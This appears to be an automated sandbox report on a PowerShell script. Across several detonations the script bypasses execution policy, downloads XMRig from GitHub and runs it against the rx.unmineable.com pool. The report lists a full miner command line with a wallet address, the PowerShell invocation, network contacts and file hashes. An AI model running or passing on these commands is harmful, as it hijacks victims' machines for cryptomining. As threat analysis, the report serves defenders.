N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.229.48:443 tcp

Files

memory/4876-0-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp

memory/4876-9-0x0000023DCE940000-0x0000023DCE962000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q4x1s0em.hcn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4876-10-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/4876-11-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/4876-12-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/4876-14-0x0000023DCE9F0000-0x0000023DCEA02000-memory.dmp

memory/4876-15-0x0000023DCE980000-0x0000023DCE98A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2312-46-0x0000022742C70000-0x0000022742C90000-memory.dmp

memory/2312-47-0x00000227D6950000-0x00000227D6970000-memory.dmp

memory/2312-48-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/4876-49-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp

memory/4876-50-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/2312-51-0x00000227D6DA0000-0x00000227D6DC0000-memory.dmp

memory/2312-52-0x00000227D6FD0000-0x00000227D6FF0000-memory.dmp

memory/2312-53-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-54-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-55-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-57-0x00000227D6FD0000-0x00000227D6FF0000-memory.dmp

memory/2312-56-0x00000227D6DA0000-0x00000227D6DC0000-memory.dmp

memory/2312-58-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-59-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-60-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-61-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-62-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-63-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-64-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-65-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-66-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-67-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-68-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-69-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-70-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-71-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-72-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-73-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-74-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-75-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-76-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-77-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-78-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-79-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-80-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-81-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-82-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-83-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-84-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-85-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-86-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-87-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-88-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-89-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-90-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-91-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-92-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-93-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-94-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-95-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-96-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-97-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-98-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-99-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-100-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-101-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-102-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-103-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-104-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-105-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-106-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-107-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-108-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-109-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-110-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-111-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-112-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-113-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-114-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-115-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-116-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:08

Platform

win7-20240508-en

Max time kernel

1563s

Max time network

1564s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Network

N/A

Files

memory/2428-4-0x000007FEF5F1E000-0x000007FEF5F1F000-memory.dmp

memory/2428-6-0x0000000001E10000-0x0000000001E18000-memory.dmp

memory/2428-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

memory/2428-7-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

memory/2428-9-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

memory/2428-10-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

memory/2428-11-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

memory/2428-8-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

memory/2428-12-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:44

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1757s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 50.192.11.51.in-addr.arpa udp

Files

memory/368-0-0x00007FFCC05B3000-0x00007FFCC05B5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_23wrggir.f3j.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/368-1-0x0000023227A20000-0x0000023227A42000-memory.dmp

memory/368-11-0x00007FFCC05B0000-0x00007FFCC1071000-memory.dmp

memory/368-12-0x00007FFCC05B0000-0x00007FFCC1071000-memory.dmp

memory/368-14-0x00007FFCC05B0000-0x00007FFCC1071000-memory.dmp

memory/368-15-0x0000023227BD0000-0x0000023227BE2000-memory.dmp

memory/368-16-0x0000023227BC0000-0x0000023227BCA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3076-47-0x000001F7DB560000-0x000001F7DB580000-memory.dmp

memory/3076-48-0x000001F7DB5B0000-0x000001F7DB5D0000-memory.dmp

memory/3076-49-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-51-0x000001F7DB5D0000-0x000001F7DB5F0000-memory.dmp

memory/3076-50-0x000001F7DCEA0000-0x000001F7DCEC0000-memory.dmp

memory/3076-52-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/368-53-0x00007FFCC05B3000-0x00007FFCC05B5000-memory.dmp

memory/368-54-0x00007FFCC05B0000-0x00007FFCC1071000-memory.dmp

memory/3076-55-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/368-56-0x00007FFCC05B0000-0x00007FFCC1071000-memory.dmp

memory/3076-57-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-58-0x000001F7DCEA0000-0x000001F7DCEC0000-memory.dmp

memory/3076-59-0x000001F7DB5D0000-0x000001F7DB5F0000-memory.dmp

memory/3076-60-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-61-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-62-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-63-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-64-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-65-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-66-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-67-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-68-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-69-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-70-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-71-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-72-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-73-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-74-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-75-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-76-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-77-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-78-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-79-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-80-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-81-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-82-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-83-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-84-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-85-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-86-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-87-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-88-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-89-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-90-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-91-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-92-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-93-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-94-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-95-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-96-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-97-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-98-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-99-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-100-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-101-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-102-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-103-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-104-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-105-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-106-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-107-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-108-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-109-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-110-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-111-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-112-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-113-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-114-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-115-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-116-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-117-0x00007FF784840000-0x00007FF785473000-memory.dmp

memory/3076-118-0x00007FF784840000-0x00007FF785473000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:45

Platform

win11-20240426-en

Max time kernel

1800s

Max time network

1762s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1500-0-0x00007FFD818D3000-0x00007FFD818D5000-memory.dmp

memory/1500-1-0x00000156F26A0000-0x00000156F26C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vojvzmla.3el.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1500-10-0x00007FFD818D0000-0x00007FFD82392000-memory.dmp

memory/1500-11-0x00007FFD818D0000-0x00007FFD82392000-memory.dmp

memory/1500-12-0x00007FFD818D0000-0x00007FFD82392000-memory.dmp

memory/1500-14-0x00000156F2740000-0x00000156F2752000-memory.dmp

memory/1500-15-0x00000156F2730000-0x00000156F273A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/656-46-0x000002358EA50000-0x000002358EA70000-memory.dmp

memory/656-47-0x000002358EAA0000-0x000002358EAC0000-memory.dmp

memory/656-48-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/1500-49-0x00007FFD818D0000-0x00007FFD82392000-memory.dmp

memory/656-50-0x000002358EAC0000-0x000002358EAE0000-memory.dmp

memory/656-52-0x0000023590390000-0x00000235903B0000-memory.dmp

memory/1500-51-0x00007FFD818D3000-0x00007FFD818D5000-memory.dmp

memory/656-53-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-54-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-55-0x000002358EAC0000-0x000002358EAE0000-memory.dmp

memory/656-57-0x0000023590390000-0x00000235903B0000-memory.dmp

memory/656-56-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-58-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-59-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-60-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-61-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

